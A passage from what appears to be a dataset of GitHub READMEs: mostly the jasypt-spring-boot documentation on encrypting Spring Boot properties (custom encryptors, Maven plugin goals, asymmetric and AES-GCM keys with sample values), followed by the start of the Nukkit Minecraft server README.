- -The only property required is the encryption password, the rest could be left to use default values. While all this properties could be declared in a properties file, the encryptor password should not be stored in a property file, it should rather be passed as system property, command line argument, or environment variable and as far as its name is `jasypt.encryptor.password` it'll work.
- -The last property, `jasypt.encryptor.proxyPropertySources` is used to indicate `jasyp-spring-boot` how property values are going to be intercepted for decryption. The default value, `false` uses custom wrapper implementations of `PropertySource`, `EnumerablePropertySource`, and `MapPropertySource`. When `true` is specified for this property, the interception mechanism will use CGLib proxies on each specific `PropertySource` implementation. This may be useful on some scenarios where the type of the original `PropertySource` must be preserved. - -## Use you own Custom Encryptor -For custom configuration of the encryptor and the source of the encryptor password you can always define your own StringEncryptor bean in your Spring Context, and the default encryptor will be ignored. For instance: - -```java - @Bean(""jasyptStringEncryptor"") - public StringEncryptor stringEncryptor() { - PooledPBEStringEncryptor encryptor = new PooledPBEStringEncryptor(); - SimpleStringPBEConfig config = new SimpleStringPBEConfig(); - config.setPassword(""password""); - config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256""); - config.setKeyObtentionIterations(""1000""); - config.setPoolSize(""1""); - config.setProviderName(""SunJCE""); - config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator""); - config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator""); - config.setStringOutputType(""base64""); - encryptor.setConfig(config); - return encryptor; - } -``` -Notice that the bean name is required, as `jasypt-spring-boot` detects custom String Encyptors by name as of version `1.5`. The default bean name is: - -``` jasyptStringEncryptor ``` - -But one can also override this by defining property: - -``` jasypt.encryptor.bean ``` - -So for instance, if you define `jasypt.encryptor.bean=encryptorBean` then you would define your custom encryptor with that name: - -```java - @Bean(""encryptorBean"") - public StringEncryptor stringEncryptor() { - ... - } -``` - -## Custom Property Detector, Prefix, Suffix and/or Resolver - -As of `jasypt-spring-boot-1.10` there are new extensions points. `EncryptablePropertySource` now uses `EncryptablePropertyResolver` to resolve all properties: - -```java -public interface EncryptablePropertyResolver { - String resolvePropertyValue(String value); -} -``` - -Implementations of this interface are responsible of both **detecting** and **decrypting** properties. The default implementation, `DefaultPropertyResolver` uses the before mentioned -`StringEncryptor` and a new `EncryptablePropertyDetector`. - -### Provide a Custom `EncryptablePropertyDetector` - -You can override the default implementation by providing a Bean of type `EncryptablePropertyDetector` with name `encryptablePropertyDetector` or if you wanna provide -your own bean name, override property `jasypt.encryptor.property.detector-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for -detecting encrypted properties. -Example: - -```java -private static class MyEncryptablePropertyDetector implements EncryptablePropertyDetector { - @Override - public boolean isEncrypted(String value) { - if (value != null) { - return value.startsWith(""ENC@""); - } - return false; - } - - @Override - public String unwrapEncryptedValue(String value) { - return value.substring(""ENC@"".length()); - } -} -``` - -```java -@Bean(name = ""encryptablePropertyDetector"") - public EncryptablePropertyDetector encryptablePropertyDetector() { - return new MyEncryptablePropertyDetector(); - } -``` - -### Provide a Custom Encrypted Property `prefix` and `suffix` - -If all you want to do is to have different prefix/suffix for encrypted properties, you can keep using all the default implementations -and just override the following properties in `application.properties` (or `application.yml`): - -```YAML -jasypt: - encryptor: - property: - prefix: ""ENC@["" - suffix: ""]"" -``` - -### Provide a Custom `EncryptablePropertyResolver` - -You can override the default implementation by providing a Bean of type `EncryptablePropertyResolver` with name `encryptablePropertyResolver` or if you wanna provide -your own bean name, override property `jasypt.encryptor.property.resolver-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for -detecting and decrypting encrypted properties. -Example: - -```java - class MyEncryptablePropertyResolver implements EncryptablePropertyResolver { - - - private final PooledPBEStringEncryptor encryptor; - - public MyEncryptablePropertyResolver(char[] password) { - this.encryptor = new PooledPBEStringEncryptor(); - SimpleStringPBEConfig config = new SimpleStringPBEConfig(); - config.setPasswordCharArray(password); - config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256""); - config.setKeyObtentionIterations(""1000""); - config.setPoolSize(1); - config.setProviderName(""SunJCE""); - config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator""); - config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator""); - config.setStringOutputType(""base64""); - encryptor.setConfig(config); - } - - @Override - public String resolvePropertyValue(String value) { - if (value != null && value.startsWith(""{cipher}"")) { - return encryptor.decrypt(value.substring(""{cipher}"".length())); - } - return value; - } - } -``` - -```java -@Bean(name=""encryptablePropertyResolver"") - EncryptablePropertyResolver encryptablePropertyResolver(@Value(""${jasypt.encryptor.password}"") String password) { - return new MyEncryptablePropertyResolver(password.toCharArray()); - } -``` - -Notice that by overriding `EncryptablePropertyResolver`, any other configuration or overrides you may have for prefixes, suffixes, -`EncryptablePropertyDetector` and `StringEncryptor` will stop working since the Default resolver is what uses them. You'd have to -wire all that stuff yourself. Fortunately, you don't have to override this bean in most cases, the previous options should suffice. - -But as you can see in the implementation, the detection and decryption of the encrypted properties are internal to `MyEncryptablePropertyResolver` - -## Using Filters - -`jasypt-spring-boot:2.1.0` introduces a new feature to specify property filters. The filter is part of the `EncryptablePropertyResolver` API -and allows you to determine which properties or property sources to contemplate for decryption. This is, before even examining the actual -property value to search for, or try to, decrypt it. For instance, by default, all properties which name start with `jasypt.encryptor` -are excluded from examination. This is to avoid circular dependencies at load time when the library beans are configured. - -### DefaultPropertyFilter properties - -By default, the `DefaultPropertyResolver` uses `DefaultPropertyFilter`, which allows you to specify the following string pattern lists: - -* jasypt.encryptor.property.filter.include-sources: Specify the property sources name patterns to be included for decryption -* jasypt.encryptor.property.filter.exclude-sources: Specify the property sources name patterns to be EXCLUDED for decryption -* jasypt.encryptor.property.filter.include-names: Specify the property name patterns to be included for decryption -* jasypt.encryptor.property.filter.exclude-names: Specify the property name patterns to be EXCLUDED for decryption - -### Provide a custom `EncryptablePropertyFilter` - -You can override the default implementation by providing a Bean of type `EncryptablePropertyFilter` with name `encryptablePropertyFilter` or if you wanna provide -your own bean name, override property `jasypt.encryptor.property.filter-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for -detecting properties and/or property sources you want to contemplate for decryption. -Example: - -```java - class MyEncryptablePropertyFilter implements EncryptablePropertyFilter { - - public boolean shouldInclude(PropertySource source, String name) { - return name.startsWith('encrypted.'); - } - } -``` - -```java -@Bean(name=""encryptablePropertyFilter"") - EncryptablePropertyFilter encryptablePropertyFilter() { - return new MyEncryptablePropertyFilter(); - } -``` - -Notice that for this mechanism to work, you should not provide a custom `EncryptablePropertyResolver` and use the default -resolver instead. If you provide custom resolver, you are responsible for the entire process of detecting and decrypting -properties. - -## Filter out `PropertySource` classes from being introspected -Define a comma-separated list of fully-qualified class names to be skipped from introspection. This classes will not be -wrapped/proxied by this plugin and thereby properties contained in them won't supported encryption/decryption: - -```properties -jasypt.encryptor.skip-property-sources=org.springframework.boot.env.RandomValuePropertySource,org.springframework.boot.ansi.AnsiPropertySource -``` -## Encryptable Properties cache refresh -Encrypted properties are cached within your application and in certain scenarios, like when using externalized configuration -from a config server the properties need to be refreshed when they changed. For this `jasypt-spring-boot` registers a -`RefreshScopeRefreshedEventListener` that listens to the following events by default to clear the encrypted properties cache: -```java -public static final List EVENT_CLASS_NAMES = Arrays.asList( - ""org.springframework.cloud.context.scope.refresh.RefreshScopeRefreshedEvent"", - ""org.springframework.cloud.context.environment.EnvironmentChangeEvent"", - ""org.springframework.boot.web.servlet.context.ServletWebServerInitializedEvent"" - ); -``` -Should you need to register extra events that you would like to trigger an encrypted cache invalidation you can add them -using the following property (separate by comma if more than one needed): -```properties -jasypt.encryptor.refreshed-event-classes=org.springframework.boot.context.event.ApplicationStartedEvent -``` - -## Maven Plugin - -A Maven plugin is provided with a number of helpful utilities. - -To use the plugin, just add the following to your pom.xml: - -```xml - - - - com.github.ulisesbocchio - jasypt-maven-plugin - 3.0.5 - - - -``` - -When using this plugin, the easiest way to provide your encryption password is via a system property i.e. --Djasypt.encryptor.password=""the password"". - -By default, the plugin will consider encryption configuration in standard Spring boot configuration files under -./src/main/resources. You can also use system properties or environment variables to supply this configuration. - -Keep in mind that the rest of your application code and resources are not available to the plugin because Maven plugins -do not share a classpath with projects. If your application provides encryption configuration via a StringEncryptor -bean then this will not be picked up. - -In general, it is recommended to just rely on the secure default configuration. - -### Encryption - -To encrypt a single value run: - -```bash -mvn jasypt:encrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""theValueYouWantToEncrypt"" -``` - -To encrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `DEC(...)`. -For example: - -```properties -sensitive.password=DEC(secret value) -regular.property=example -``` - -Then run: - -```bash -mvn jasypt:encrypt -Djasypt.encryptor.password=""the password"" -``` - -Which would edit that file in place resulting in: - -```properties -sensitive.password=ENC(encrypted) -regular.property=example -``` - -The file name and location can be customised. - -### Decryption - -To decrypt a single value run: - -```bash -mvn jasypt:decrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""DbG1GppXOsFa2G69PnmADvQFI3esceEhJYbaEIKCcEO5C85JEqGAhfcjFMGnoRFf"" -``` - -To decrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `ENC(...)`. For -example: - -```properties -sensitive.password=ENC(encrypted) -regular.property=example -``` - -This can be decrypted as follows: - -```bash -mvn jasypt:decrypt -Djasypt.encryptor.password=""the password"" -``` - -Which would output the decrypted contents to the screen: - -```properties -sensitive.password=DEC(decrypted) -regular.property=example -``` - -Note that outputting to the screen, rather than editing the file in place, is designed to reduce -accidental committing of decrypted values to version control. When decrypting, you most likely -just want to check what value has been encrypted, rather than wanting to permanently decrypt that -value. - -### Re-encryption -Changing the configuration for existing encrypted properties is slightly awkward using the encrypt/decrypt goals. You -must run the decrypt goal using the old configuration, then copy the decrypted output back into the original file, then -run the encrypt goal with the new configuration. - -The re-encrypt goal simplifies this by re-encrypting a file in place. 2 sets of configuration must be provided. The -new configuration is supplied in the same way as you would configure the other maven goals. The old configuration -is supplied via system properties prefixed with ""jasypt.plugin.old"" instead of ""jasypt.encryptor"". - -For example, to re-encrypt application.properties that was previously encrypted with the password OLD and then -encrypt with the new password NEW: - -```bash -mvn jasypt:reencrypt -Djasypt.plugin.old.password=OLD -Djasypt.encryptor.password=NEW -``` - -*Note: All old configuration must be passed as system properties. Environment variables and Spring Boot configuration -files are not supported.* - -### Upgrade -Sometimes the default encryption configuration might change between versions of jasypt-spring-boot. You can -automatically upgrade your encrypted properties to the new defaults with the upgrade goal. This will decrypt your -application.properties file using the old default configuration and re-encrypt using the new default configuration. - -```bash -mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE -``` - -You can also pass the system property `-Djasypt.plugin.old.major-version` to specify the version you are upgrading from. -This will always default to the last major version where the configuration changed. Currently, the only major version -where the defaults changed is version 2, so there is no need to set this property, but it is there for future use. - -### Load -You can also decrypt a properties file and load all of its properties into memory and make them accessible to Maven. This is useful when you want to make encrypted properties available to other Maven plugins. - -You can chain the goals of the later plugins directly after this one. For example, with flyway: - -```bash -mvn jasypt:load flyway:migrate -Djasypt.encryptor.password=""the password"" -``` - -You can also specify a prefix for each property with `-Djasypt.plugin.keyPrefix=example.`. This -helps to avoid potential clashes with other Maven properties. - -### Changing the file path - -For all the above utilities, the path of the file you are encrypting/decrypting defaults to -`file:src/main/resources/application.properties`. - -This can be changed using the `-Djasypt.plugin.path` system property. - -You can encrypt a file in your test resources directory: - -```bash -mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/test/application.properties"" -Djasypt.encryptor.password=""the password"" -``` - -Or with a different name: - -```bash -mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/resources/flyway.properties"" -Djasypt.encryptor.password=""the password"" -``` - -Or with a different file type (the plugin supports any plain text file format including YAML): - -```bash -mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/resources/application.yaml"" -Djasypt.encryptor.password=""the password"" -``` - -**Note that the load goal only supports .property files** - -### Spring profiles and other spring config -You can override any spring config you support in your application when running the plugin, for instance selecting a given spring profile: - -```bash -mvn jasypt:encrypt -Dspring.profiles.active=cloud -Djasypt.encryptor.password=""the password"" -``` -### Multi-module maven projects -To encrypt/decrypt properties in multi-module projects disable recursion with `-N` or `--non-recursive` on the maven command: -```bash -mvn jasypt:upgrade -Djasypt.plugin.path=file:server/src/test/resources/application-test.properties -Djasypt.encryptor.password=supersecret -N -``` - -## Asymmetric Encryption -`jasypt-spring-boot:2.1.1` introduces a new feature to encrypt/decrypt properties using asymmetric encryption with a pair of private/public keys -in DER or PEM formats. - -### Config Properties - -The following are the configuration properties you can use to config asymmetric decryption of properties; - - - - - - - - - - - - - - -
KeyDefault ValueDescription
jasypt.encryptor.privateKeyStringnull private key for decryption in String format
jasypt.encryptor.privateKeyLocationnulllocation of the private key for decryption in spring resource format
jasypt.encryptor.privateKeyFormatDERKey format. DER or PEM
- - You should either use `privateKeyString` or `privateKeyLocation`, the String format takes precedence if set. - To specify a private key in DER format with `privateKeyString`, please encode the key bytes to `base64`. - - __Note__ that `jasypt.encryptor.password` still takes precedences for PBE encryption over the asymmetric config. - -### Sample config - -#### DER key as string -```yaml -jasypt: - encryptor: - privateKeyString: MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYMZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+LIQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1iG9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpAuAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMUvcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQaNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLIDYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKBV/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPazXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXuPmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPkbPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJDiy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRffumowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kIohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIBt3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSard+dewfKoPnWw0WyGFEWCg== - -``` - -#### DER key as a resource location -```yaml -jasypt: - encryptor: - privateKeyLocation: classpath:private_key.der - -``` - -#### PEM key as string -```yaml -jasypt: - encryptor: - privateKeyFormat: PEM - privateKeyString: |- - -----BEGIN PRIVATE KEY----- - MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYM - ZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+L - IQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39 - orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1i - G9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpA - uAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr - 2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMU - vcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54 - kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQ - aNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLI - DYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKB - V/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPa - zXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXu - PmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPk - bPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO - 5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJ - Diy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRff - umowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kI - ohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3 - UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584 - JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/ - jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIB - t3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1 - Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0 - lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSa - rd+dewfKoPnWw0WyGFEWCg== - -----END PRIVATE KEY----- - -``` - -#### PEM key as a resource location -```yaml -jasypt: - encryptor: - privateKeyFormat: PEM - privateKeyLocation: classpath:private_key.pem - -``` - -### Encrypting properties - -There is no program/command to encrypt properties using asymmetric keys but you can use the following code snippet to encrypt -your properties: - -#### DER Format - -```java -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; -import org.jasypt.encryption.StringEncryptor; - -public class PropertyEncryptor { - public static void main(String[] args) { - SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); - config.setPublicKey(""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGPVNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GBnIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBUFcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKsnu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pqIVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBgkQIDAQAB""); - StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); - String message = ""chupacabras""; - String encrypted = encryptor.encrypt(message); - System.out.printf(""Encrypted message %s\n"", encrypted); - } -} -``` - -#### PEM Format - -```java -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; -import org.jasypt.encryption.StringEncryptor; -import static com.ulisesbocchio.jasyptspringboot.util.AsymmetricCryptography.KeyFormat.PEM; - -public class PropertyEncryptor { - public static void main(String[] args) { - SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); - config.setKeyFormat(PEM); - config.setPublicKey(""-----BEGIN PUBLIC KEY-----\n"" + - ""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGP\n"" + - ""VNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GB\n"" + - ""nIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBU\n"" + - ""FcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKs\n"" + - ""nu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pq\n"" + - ""IVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBg\n"" + - ""kQIDAQAB\n"" + - ""-----END PUBLIC KEY-----\n""); - StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); - String message = ""chupacabras""; - String encrypted = encryptor.encrypt(message); - System.out.printf(""Encrypted message %s\n"", encrypted); - } -} -``` -## AES 256-GCM Encryption -As of version 3.0.5, AES 256-GCM Encryption is supported. To use this type of encryption, set the property `jasypt.encryptor.gcm-secret-key-string`, `jasypt.encryptor.gcm-secret-key-location` or `jasypt.encryptor.gcm-secret-key-password`.
-The underlying algorithm used is `AES/GCM/NoPadding` so make sure that's installed in your JDK.
-The `SimpleGCMByteEncryptor` uses a `IVGenerator` to encrypt properties. You can configure that with property `jasypt.encryptor.iv-generator-classname` if you don't want to -use the default implementation `RandomIvGenerator` -### Using a key -When using a key via `jasypt.encryptor.gcm-secret-key-string` or `jasypt.encryptor.gcm-secret-key-location`, make sure you encode your key in base64. -The base64 string value could set to `jasypt.encryptor.gcm-secret-key-string`, or just can save it in a file and use a spring resource locator to that file in property `jasypt.encryptor.gcm-secret-key-location`. For instance: -```properties -jasypt.encryptor.gcm-secret-key-string=""PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU="" -#OR -jasypt.encryptor.gcm-secret-key-location=classpath:secret_key.b64 -#OR -jasypt.encryptor.gcm-secret-key-location=file:/full/path/secret_key.b64 -#OR -jasypt.encryptor.gcm-secret-key-location=file:relative/path/secret_key.b64 -``` -Optionally, you can create your own `StringEncryptor` bean: -```java -@Bean(""encryptorBean"") -public StringEncryptor stringEncryptor() { - SimpleGCMConfig config = new SimpleGCMConfig(); - config.setSecretKey(""PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU=""); - return new SimpleGCMStringEncryptor(config); -} -``` -### Using a password -Alternatively, you can use a password to encrypt/decrypt properties using AES 256-GCM. The password is used to generate a -key on startup, so there is a few properties you need to/can set, these are: -```properties -jasypt.encryptor.gcm-secret-key-password=""chupacabras"" -#Optional, defaults to ""1000"" -jasypt.encryptor.key-obtention-iterations=""1000"" -#Optional, defaults to 0, no salt. If provided, specify the salt string in ba64 format -jasypt.encryptor.gcm-secret-key-salt=""HrqoFr44GtkAhhYN+jP8Ag=="" -#Optional, defaults to PBKDF2WithHmacSHA256 -jasypt.encryptor.gcm-secret-key-algorithm=""PBKDF2WithHmacSHA256"" -``` -Make sure this parameters are the same if you're encrypting your secrets with external tools. -Optionally, you can create your own `StringEncryptor` bean: -```java -@Bean(""encryptorBean"") -public StringEncryptor stringEncryptor() { - SimpleGCMConfig config = new SimpleGCMConfig(); - config.setSecretKeyPassword(""chupacabras""); - config.setSecretKeyIterations(1000); - config.setSecretKeySalt(""HrqoFr44GtkAhhYN+jP8Ag==""); - config.setSecretKeyAlgorithm(""PBKDF2WithHmacSHA256""); - return new SimpleGCMStringEncryptor(config); -} -``` -### Encrypting properties with AES GCM-256 -You can use the [Maven Plugin](#maven-plugin) or follow a similar strategy as explained in [Asymmetric Encryption](#asymmetric-encryption)'s [Encrypting Properties](#encrypting-properties) -## Demo App -The [jasypt-spring-boot-demo-samples](https://github.com/ulisesbocchio/jasypt-spring-boot-samples) repo contains working Spring Boot app examples. -The main [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) Demo app explicitly sets a System property with the encryption password before the app runs. -To have a little more realistic scenario try removing the line where the system property is set, build the app with maven, and the run: - -``` - java -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar --jasypt.encryptor.password=password -``` -And you'll be passing the encryption password as a command line argument. -Run it like this: - -``` - java -Djasypt.encryptor.password=password -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar -``` -And you'll be passing the encryption password as a System property. - -If you need to pass this property as an Environment Variable you can accomplish this by creating application.properties or application.yml and adding: -``` -jasypt.encryptor.password=${JASYPT_ENCRYPTOR_PASSWORD:} -``` -or in YAML -``` -jasypt: - encryptor: - password: ${JASYPT_ENCRYPTOR_PASSWORD:} -``` -basically what this does is to define the `jasypt.encryptor.password` property pointing to a different property `JASYPT_ENCRYPTOR_PASSWORD` that you can set with an Environment Variable, and you can also override via System Properties. This technique can also be used to translate property name/values for any other library you need. -This is also available in the Demo app. So you can run the Demo app like this: - -``` -JASYPT_ENCRYPTOR_PASSWORD=password java -jar target/jasypt-spring-boot-demo-1.5-SNAPSHOT.jar -``` - -**Note:** When using Gradle as build tool, processResources task fails because of '$' character, to solve this you just need to scape this variable like this '\\$'. - -## Other Demo Apps -While [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) is a comprehensive Demo that showcases all possible ways to encrypt/decrypt properties, there are other multiple Demos that demo isolated scenarios. - -[//]: # (## Flattr) - -[//]: # ([![Flattr this git repo](http://api.flattr.com/button/flattr-badge-large.png)](https://flattr.com/@ubocchio/github/ulisesbocchio)) -",0 -CloudburstMC/Nukkit,Cloudburst Nukkit - Nuclear-Powered Minecraft: Bedrock Edition Server Software,2017-12-04T19:55:58Z,,"![nukkit](.github/images/banner.png) - -[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](LICENSE) -[![Build Status](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/badge/icon)](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/) -[![Discord](https://img.shields.io/discord/393465748535640064.svg)](https://discord.gg/5PzMkyK) - -Introduction -------------- - -Nukkit is nuclear-powered server software for Minecraft: Pocket Edition. -It has a few key advantages over other server software: - -* Written in Java, Nukkit is faster and more stable. -* Having a friendly structure, it's easy to contribute to Nukkit's development and rewrite plugins from other platforms into Nukkit plugins. - -Nukkit is **under improvement** yet, we welcome contributions. - -Links --------------------- - -* __[News](https://nukkitx.com)__ -* __[Forums](https://nukkitx.com/forums)__ -* __[Discord](https://discord.gg/5PzMkyK)__ -* __[Download](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master)__ -* __[Plugins](https://nukkitx.com/resources/categories/nukkit-plugins.1)__ -* __[Wiki](https://nukkitx.com/wiki/nukkit)__ - -Contributing -------------- -Please read the [CONTRIBUTING](.github/CONTRIBUTING.md) guide before submitting any issue. Issues with insufficient information or in the wrong format will be closed and will not be reviewed. - -Build JAR file -------------- -- `git clone https://github.com/CloudburstMC/Nukkit` -- `cd Nukkit` -- `git submodule update --init` -- `./gradlew shadowJar` - -The compiled JAR can be found in the `target/` directory. - -Running -------------- -Simply run `java -jar nukkit-1.0-SNAPSHOT.jar`. - -Plugin API -------------- -Information on Nukkit's API can be found at the [wiki](https://nukkitx.com/wiki/nukkit/). - -Docker -------------- - -Running Nukkit in [Docker](https://www.docker.com/) (17.05+ or higher). - -Build image from the source, - -``` -docker build -t nukkit . -``` - -Run once to generate the `nukkit-data` volume, default settings, and choose language, - -``` -docker run -it -p 19132:19132/udp -v nukkit-data:/data nukkit -``` -Docker Compose -------------- - -Use [docker-compose](https://docs.docker.com/compose/overview/) to start server on port `19132` and with `nukkit-data` volume, - -``` -docker-compose up -d -``` - -Kubernetes & Helm -------------- - -Validate the chart: - -`helm lint charts/nukkit` - -Dry run and print out rendered YAML: - -`helm install --dry-run --debug nukkit charts/nukkit` - -Install the chart: - -`helm install nukkit 